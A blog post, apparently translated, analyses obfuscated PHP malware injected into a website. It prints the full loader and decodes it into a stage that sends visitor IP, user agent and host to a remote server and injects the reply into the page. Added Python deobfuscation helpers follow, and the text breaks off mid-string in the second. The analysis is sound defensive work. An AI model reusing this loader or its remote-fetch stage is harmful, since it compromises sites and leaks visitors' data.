Sorai-san's service was reportedly tampered with, and since the attack code was posted, I took a look and analyzed it.
So I went through the code. The obfuscation mechanism itself is simple, but following the code was pretty exhausting lol
The code in question
Here is the code in question.
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "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"; $eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65"; $eva1tYldakBcVSir = "\x73\164\x72\162\x65\166"; $eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160"; $eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r); $eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir); $eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir); $eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061]; $eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr); $eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031])); $eva1tYldakBcVSir = ""; $eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir; $eva1tYidokBoVSjr = $eva1tYlbakBcVSir; $eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72"; $eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65"; $eva1tYldakBoVS1r = "\x65\143\x72\160"; $eva1tYldakBcVSir = ""; $eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir; $eva1tYidokBoVSjr = $eva1tYlbakBcVSir; } ?>
Let's expand this step by step.
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { //$eva1fYlbakBcVSir = "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";
Some string that has been BASE64-encoded.
//$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65"; $eva1tYlbakBcVSir = "edolpxe";
Decoding the hex gives "edolpxe", which is "explode" reversed.
//$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166"; $eva1tYldakBcVSir = "strrev";
The "strrev" function, used to restore the reversed strings, has been converted to hex.
//$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160"; $eva1tYldakBoVS1r = "ecalper_gerp";
Decoding the hex and reversing this one gives "preg_replace".
//$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145"; $eva1tYidokBoVSjr = ';))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@:eval("\1");:@(.+)@ie';
Decoding the hex and reversing this one too gives ei@)+.(@:;)"1\"(lave:@eval(base64_decode($eva1tYidakBcVSjr[1]));, which looks like the trailing part that will be fed to preg_replace. You can also see the part that decodes the BASE64 string defined on the very first line.
//$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r); $eva1tYldokBcVSjr = strrev( "ecalper_gerp" );
This line restores the reversed hex string from before: strrev("ecalper_gerp") → preg_replace
//$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir); $eva1tYldakBcVSjr = strrev( "edolpxe" );
This line restores the reversed hex string from before: strrev("edolpxe") → explode
//$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir); $eva1tYidakBcVSjr = $eva1tYldakBcVSjr( '+', $eva1fYlbakBcVSir );
In other words, $eva1tYidakBcVSjr = explode('+', <BASE64-encoded string>);
explode splits the string given as its second argument on the character given as its first argument. So the BASE64 string from line 1 gets split at the "+" character that appears partway through it.
Doing this gives:
Array ( [0] => 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 [1] => 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 )
As shown above, it was split into two parts.
//$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061]; $eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.001891];
This takes an element out of the array produced by the explode on the line above; [0.001891] becomes [0] when converted to int, so the first part, 7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn….Jg0DI1UTayZGJ, is extracted.
At first glance this looks like a decoy, since on the surface nothing executes it, but as the analysis proceeds it turns out to play an important role later.
//$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr); $eva1tYidokBcVSjr = $eva1tYldakBcVSjr( ':', $eva1tYidokBoVSjr);
In other words,
$eva1tYidokBcVSjr = explode(':',';))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@:eval("\1");:@(.+)@ie');
is executed.
Since it splits on : here,
Array ( [0] => ;))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@ [1] => eval("\1"); [2] => @(.+)@ie )
these three array elements come out.
//$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031])); $eva1tYldokBcVSjr( $eva1tYidokBcVSjr[2], $eva1tYidokBcVSjr[1], strrev( $eva1tYidokBcVSjr[0.001891]) );
In other words,
preg_replace( "@(.+)@ie", 'eval("\1");', '@eval(base64_decode($eva1tYidakBcVSjr[1]));' );
That's what this is: the [1] half, i.e. the part after the + from splitting the BASE64 string at the beginning, gets base64-decoded. (The e modifier on the pattern makes preg_replace evaluate the replacement, eval("\1");, as PHP code, with \1 being the whole subject string.)
Now, doing base64_decode(the part of the BASE64 string after the +) yields
if (!isset($evalUdCXTDQERmWnDS)) {function evallwhVfIVnWPbT($s){$e = ""; for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==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"(edoced_46esab(lave'));$evalUdCXTDQERmWnDS =18792;}
This new PHP code appears, and eval evaluates (executes) it.
The rest of the code below this point is a decoy with no meaning.
$eva1tYldakBcVSir = ""; //$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir; $eva1tYldakBoVS1r = "edolpxe"."edolpxe"; //$eva1tYidokBoVSjr = $eva1tYlbakBcVSir; $eva1tYidokBoVSjr = "edolpxe"; //$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72"; $eva1tYldakBcVSir = "strecrptr"; //$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65"; $eva1tYlbakBcVSir = "gao[pxe"; //$eva1tYldakBoVS1r = "\x65\143\x72\160"; $eva1tYldakBoVS1r = "ecrp"; $eva1tYldakBcVSir = ""; //$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir; $eva1tYldakBoVS1r = "gao[pxe"."gao[pxe"; //$eva1tYidokBoVSjr = $eva1tYlbakBcVSir; $eva1tYidokBoVSjr = "gao[pxe"; } ?>
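A Python helper, added here as an example and not part of the original post, that carries out stage 1 mechanically: it resolves the \xHH/\NNN escapes, the chr() float tricks and the float array indexes from the sample above and returns the arguments that reach preg_replace. The first-line BASE64 blob is redacted on this page, so the caller passes a constructed stand-in.

```python
import re

# PHP double-quoted escapes the dropper hides names behind: \xHH (hex) and \NNN (octal).
_PHP_ESC = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')


def php_unescape(s):
    """Resolve a "\x65\144..." style literal to plain text, as the PHP parser does."""
    return _PHP_ESC.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) else chr(int(m.group(2), 8)), s)


def php_int(x):
    """PHP truncates a float used as a chr() argument or as an array key toward zero."""
    return int(x)


# Escaped literals copied from the first stage of the sample above.
OBF = {
    'explode_rev':      r'\x65\144\x6f\154\x70\170\x65',
    'strrev':           r'\x73\164\x72\162\x65\166',
    'preg_replace_rev': r'\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160',
    'template':         r'\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164'
                        r'\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141'
                        r'\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b'
                        r'\72\x40\50\x2e\53\x29\100\x69\145',
}


def resolve_stage1(blob):
    """Walk the first stage with every disguised constant resolved.

    `blob` stands in for the BASE64-looking string on the sample's first line
    (redacted on this page); it must contain exactly one '+'."""
    explode_name = php_unescape(OBF['explode_rev'])[::-1]       # strrev("edolpxe")
    preg_name = php_unescape(OBF['preg_replace_rev'])[::-1]     # strrev("ecalper_gerp")
    plus = chr(php_int(2687.5 * 0.016))                          # chr(43) -> '+'
    colon = chr(php_int(3625 * 0.016))                           # chr(58) -> ':'

    # explode('+', blob): '+' is a legal base64 character, so base64-decoding the
    # whole blob yields garbage; it is two payloads glued together with '+'.
    halves = blob.split(plus)
    if len(halves) != 2:
        raise ValueError('expected exactly one "+" in the first-line blob')
    stage2_rev = halves[php_int(0.031 * 0.061)]                  # [0.001891] -> [0]
    stage2 = halves[1]

    parts = php_unescape(OBF['template']).split(colon)           # explode(':', ...)
    pattern = parts[php_int(0.016 * (7812.5 * 0.016))]          # [2] -> '@(.+)@ie'
    replacement = parts[php_int(62.5 * 0.016)]                   # [1] -> 'eval("\1");'
    subject = parts[php_int(0.061 * 0.031)][::-1]                # strrev([0])
    # The trailing 'e' modifier makes preg_replace evaluate the replacement as PHP,
    # and "\1" is the whole subject, so this call is eval() on the subject string.
    return {
        'functions': (explode_name, preg_name),
        'separators': (plus, colon),
        'preg_replace_args': (pattern, replacement, subject),
        'stage2_rev_b64': stage2_rev,   # kept for later: strrev() then base64_decode()
        'stage2_b64': stage2,           # base64_decode()d and eval()ed immediately
    }


if __name__ == '__main__':
    for k, v in resolve_stage1('AAAA+BBBB').items():   # constructed stand-in blob
        print(k, '=', v)
```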
Analysis of the key code that was produced
if (!isset($evalUdCXTDQERmWnDS)) { function evallwhVfIVnWPbT($s){ $e = ""; for ($a = 0; $a <= strlen($s)-1; $a++ ){ $e .= $s{strlen($s)-$a-1}; } return($e); } eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"==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"(edoced_46esab(lave')); $evalUdCXTDQERmWnDS =18792; }
Cleaning up the formatting gives the above.
All the "evallwhVfIVnWPbT" function does is reverse a string, exactly like strrev; the result is then evaluated (executed).
Let's run each line through the function one at a time.
//eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave')); eval(base64_decode("ZnVuY3Rpb24gZXZhbE1OaFBPbFRhZ0lPZkJTRigkZXZhbElZQWNGc29ZdEFuZE1rKSB7cmV0dXJuIGJhc2U2NF9kZWNvZGUoJGV2YWxJWUFjRnNvWXRBbmRNayk7fSA="));
//eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxhbVNFaVlVZENnZFNXPWV2YWxNTmhQT2xUYWdJT2ZCU0YoImMzUmhkSE09Iik7"));
//eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxUV2VpclZhcVZXPWV2YWxNTmhQT2xUYWdJT2ZCU0YoImFIUjBjQT09Iik7"));
//eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxCZFVidEdVRFhmQj1ldmFsTU5oUE9sVGFnSU9mQlNGKCJhVzQ9Iik7"));
//eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxRd2JsQ2VuRnpVZT1ldmFsTU5oUE9sVGFnSU9mQlNGKCJJV2R2SVE9PSIpOw=="));
//eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxyTXNpdnBNZ2NmQz0kX1NFUlZFUltldmFsTU5oUE9sVGFnSU9mQlNGKCJTRlJVVUY5VlUwVlNYMEZIUlU1VSIpXTs="));
//eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave')); eval(base64_decode("ZXZhbChldmFsTU5oUE9sVGFnSU9mQlNGKHN0cnJldigkZXZhMXRZWGRha0FjVlNqcikpKTs="));
//eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxUdERudEdzb2hEUHQgPSBhcnJheShldmFsTU5oUE9sVGFnSU9mQlNGKCJSMjl2WjJ4bCIpLCBldmFsTU5oUE9sVGFnSU9mQlNGKCJVMngxY25BPSIpLCBldmFsTU5oUE9sVGFnSU9mQlNGKCJUVk5PUW05MCIpLCBldmFsTU5oUE9sVGFnSU9mQlNGKCJhV0ZmWVhKamFHbDJaWEk9IiksIGV2YWxNTmhQT2xUYWdJT2ZCU0YoIldXRnVaR1Y0IiksIGV2YWxNTmhQT2xUYWdJT2ZCU0YoIlVtRnRZbXhsY2c9PSIpKTs="));
//eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave')); eval(base64_decode("ZXZhbChldmFsTU5oUE9sVGFnSU9mQlNGKCJablZ1WTNScGIyNGdaWFpoYkZkRlRVSkphM0ZaVDBsSlIyTk1RbTRvSkhNcElIdHlaWFIxY200Z1FHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDUnpLVHQ5IikpOw=="));
//eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxnS2dIT1hyRHpYID0gJGRkMCgpOw=="));
//eval(evallwhVfIVnWPbT(';))"==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"(edoced_46esab(lave')); eval(base64_decode("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"));
Decoding these base64 strings gives
function evalMNhPOlTagIOfBSF($evalIYAcFsoYtAndMk) {return base64_decode($evalIYAcFsoYtAndMk);} $evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM="); $evalTWeirVaqVW=evalMNhPOlTagIOfBSF("aHR0cA=="); $evalBdUbtGUDXfB=evalMNhPOlTagIOfBSF("aW4="); $evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ=="); $evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")]; eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr))); $evalTtDntGsohDPt = array(evalMNhPOlTagIOfBSF("R29vZ2xl"), evalMNhPOlTagIOfBSF("U2x1cnA="), evalMNhPOlTagIOfBSF("TVNOQm90"), evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="), evalMNhPOlTagIOfBSF("WWFuZGV4"), evalMNhPOlTagIOfBSF("UmFtYmxlcg==")); eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9")); $evalgKgHOXrDzX = $dd0(); if((preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) {} else { @setcookie($evalamSEiYUdCgdSW,md5(evalMNhPOlTagIOfBSF("c3RhdHM=")),time()+10800); $evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW.evalMNhPOlTagIOfBSF("Og==").evalMNhPOlTagIOfBSF("Ly8=").$evalgKgHOXrDzX.evalMNhPOlTagIOfBSF("Lw==").$evalBdUbtGUDXfB.evalMNhPOlTagIOfBSF("LnBo").evalMNhPOlTagIOfBSF("cD8=").evalMNhPOlTagIOfBSF("aT0=").$_SERVER[evalMNhPOlTagIOfBSF("UkVNT1RFX0FERFI=")].evalMNhPOlTagIOfBSF("JmI9").urlencode($evalrMsivpMgcfC).evalMNhPOlTagIOfBSF("Jmg9").urlencode($_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9IT1NU")]));if (strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch); $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];echo $evalsssgqulVBTkZLAch;}}
This is what comes back, so let's format it.
function evalMNhPOlTagIOfBSF($evalIYAcFsoYtAndMk) { return base64_decode($evalIYAcFsoYtAndMk); } $evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM="); $evalTWeirVaqVW=evalMNhPOlTagIOfBSF("aHR0cA=="); $evalBdUbtGUDXfB=evalMNhPOlTagIOfBSF("aW4="); $evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ=="); $evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")]; eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr))); $evalTtDntGsohDPt = array( evalMNhPOlTagIOfBSF("R29vZ2xl"), evalMNhPOlTagIOfBSF("U2x1cnA="), evalMNhPOlTagIOfBSF("TVNOQm90"), evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="), evalMNhPOlTagIOfBSF("WWFuZGV4"), evalMNhPOlTagIOfBSF("UmFtYmxlcg==") ); eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9")); $evalgKgHOXrDzX = $dd0(); if( (preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) { } else { @setcookie($evalamSEiYUdCgdSW,md5(evalMNhPOlTagIOfBSF("c3RhdHM=")),time()+10800); $evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW.evalMNhPOlTagIOfBSF("Og==").evalMNhPOlTagIOfBSF("Ly8=").$evalgKgHOXrDzX.evalMNhPOlTagIOfBSF("Lw==").$evalBdUbtGUDXfB.evalMNhPOlTagIOfBSF("LnBo").evalMNhPOlTagIOfBSF("cD8=").evalMNhPOlTagIOfBSF("aT0=").$_SERVER[evalMNhPOlTagIOfBSF("UkVNT1RFX0FERFI=")].evalMNhPOlTagIOfBSF("JmI9").urlencode($evalrMsivpMgcfC).evalMNhPOlTagIOfBSF("Jmg9").urlencode($_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9IT1NU")])); if ( strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){ $evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch); $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1]; echo $evalsssgqulVBTkZLAch; } }
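A second Python helper, added here as an example and not from the post, that automates the two layers just shown: it reverses one evallwhVfIVnWPbT line and base64-decodes it, finds the base64 wrapper function that line defines, and then inlines every wrapper("...") call in the decoded code so the literals read as plain strings. The reversed line and the stage-2 fragment are copied (the fragment trimmed) from the code above.

```python
import base64
import re


def unreverse_eval_line(line):
    """Undo one evallwhVfIVnWPbT(...) line: strrev it, then base64_decode the payload.

    Returns the PHP source that eval() would have run."""
    forward = line[::-1]                      # evallwhVfIVnWPbT() is just strrev()
    m = re.fullmatch(r'eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);', forward)
    if not m:
        raise ValueError('not an eval(base64_decode("...")) statement after reversal')
    return base64.b64decode(m.group(1)).decode('latin-1')


def find_b64_wrapper(php):
    """Name of a helper shaped like  function X($a) {return base64_decode($a);}  or None."""
    m = re.search(r'function\s+(\w+)\s*\(\s*(\$\w+)\s*\)\s*\{\s*return\s+'
                  r'base64_decode\(\s*\2\s*\)\s*;\s*\}', php)
    return m.group(1) if m else None


def _php_single_quoted(s):
    return "'" + s.replace('\\', '\\\\').replace("'", "\\'") + "'"


def peel_literals(php, wrapper):
    """Inline every wrapper("BASE64") call so the code reads as the attacker wrote it.

    eval(wrapper("...")); becomes the decoded statement itself; any other call
    becomes a single-quoted PHP literal."""
    call = re.escape(wrapper) + r'\(\s*"([A-Za-z0-9+/=]*)"\s*\)'
    decode = lambda m: base64.b64decode(m.group(1)).decode('latin-1')
    php = re.sub(r'eval\(\s*' + call + r'\s*\)\s*;', decode, php)
    return re.sub(call, lambda m: _php_single_quoted(decode(m)), php)


# The first evallwhVfIVnWPbT line from the sample above, verbatim.
REVERSED_LINE = (';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92'
                 'cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave')

# Statements copied from the decoded second stage, trimmed to the ones analysed below.
STAGE2 = ('$evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM="); '
          '$evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ=="); '
          '$evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")]; '
          '$evalTtDntGsohDPt = array( evalMNhPOlTagIOfBSF("R29vZ2xl"), '
          'evalMNhPOlTagIOfBSF("U2x1cnA="), evalMNhPOlTagIOfBSF("TVNOQm90"), '
          'evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="), evalMNhPOlTagIOfBSF("WWFuZGV4"), '
          'evalMNhPOlTagIOfBSF("UmFtYmxlcg==") ); '
          'eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4g'
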